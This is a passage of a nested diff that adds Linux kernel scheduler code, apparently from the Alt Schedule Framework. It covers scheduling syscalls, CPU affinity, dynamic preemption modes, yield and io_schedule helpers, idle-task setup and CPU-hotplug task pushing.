++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * which part the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, mask, cpus_allowed);
++again:
++	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++		goto again;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	retval = __sched_setaffinity(p, in_mask);
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In Alt schedule FW, yield_to is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, cpumask_of(cpu));
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
++ * effective when the hotplug motion is down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
